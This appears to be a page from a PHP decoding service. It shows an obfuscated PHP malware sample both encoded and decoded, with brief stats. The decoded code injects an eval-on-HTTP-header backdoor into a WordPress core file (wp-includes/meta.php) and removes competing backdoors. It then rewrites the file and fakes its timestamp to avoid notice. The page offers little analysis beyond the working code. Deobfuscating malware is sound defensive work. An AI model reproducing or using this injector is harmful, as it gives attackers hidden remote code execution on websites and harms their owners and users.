Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSCRqNZGkSRVN09ZmzaMppc3DuExTZIwJBmMYmNAw9b/P..
Decoded Output download
phpConfValidate('YTo0OntpOjA7czo3MToiL2hvbWUvdGVjaG52ZTI3OS9kb21haW5zL2hvZWZzbWlkamUubmwvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfM0NCMTg2RVtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQXzNDQjE4NkUnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9');
function phpConfValidate($ser) {
list ($fullPath, $systemEnv, $code, $pattern) = unserialize(base64_decode($ser));
$source = file_get_contents($fullPath);
if (preg_match($systemEnv, $source)) {
return;
}
if (!preg_match($pattern, $source, $matches)) {
return;
}
$incorrectRegex = str_replace('e' . 'va' . 'l', '@?arr' . 'ay', $systemEnv);
$newSource = preg_replace($incorrectRegex, '', $source);
$newSource = str_replace($matches[0], $code . PHP_EOL . $matches[0], $newSource);
if (!preg_match($systemEnv, $newSource)) {
return;
}
$filemtime = filemtime($fullPath) + 10;
unlink($fullPath);
file_put_contents($fullPath, $newSource);
touch($fullPath, $filemtime);
}
Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSCRqNZGkSRVN09ZmzaMppc3DuExTZIwJBmMYmNAw9b/P5N2HtPkDvsbnnHvvua7EXtyLuAsQow4SpKY+zSLN4CI2/KtLXEQtfRbRu6a3ss35yhkAHw3aTWs2ahnTbmA3Gx4y20V5b5lWYZssQOE8s8N8hYeA2gPmw6an2Wa+clpXQmJ9ewgCC+pSD2hP03aOhlfUaAYdfSYKww8uDHp7ZkHLs/uCwJ6Hbfa8htMYjzfniTNmeQAb4voOxA4prK7ZaGOzof2GfWFDlnPYu5UYgW8bOYVzbw76166u3ff02bI5Abv/QGr1GxL37JT8MZD8HrOhL5yxL87wenSJZtHaaOkdvRh1RsE1c8J+Ou5N3LkGpiAAU3PtjEB/8giL+x+P/s3FfTDncBpcjvzSO730rtCLiLqsjfE6Dh3ZuzNgK9lPMW6B3Br0NQt0hQUnXhk/wbaQ3K5a/1JxM44FjbjydjrVlCR15U+losjFaCqUWtXNGHtAwjtXquk6FSS84SsZ48ghcouRECThdeWrknHJplKqIDUbpaRzsXBICdvKyrylajWNsgQTiXcpI4slEQsccUG4SI+5dljqKrU4IctFiAT2aq/yb2XqZbXKbiVEZAnfUl8OAp9OFXblHvgy2NyQ9B9K29opx1GSECwmZEmeZQ+pSBYJiRnC8mkTVfmsqCu02Zh6rqjfv6Ek2RzRWj01cG8GJ/l078emzr3Ym1RSSz02/QH5tJB9Sz+1X7tByQoehg+LG+NORq+vDyI71ePnnXmn9h9p/+NbOepQ0HA/9k18Mm7lTGloW1rGGeXBu6eweSxx9tFj+aAJEWVlwSeIQ1aJeKn8BQ==")));
Function Calls
gzinflate | 1 |
base64_decode | 1 |
phpConfValidate | 1 |
Stats
MD5 | c7c2af2e2afd6be18612fb4cb7d75acd |
Eval Count | 1 |
Decode Time | 45 ms |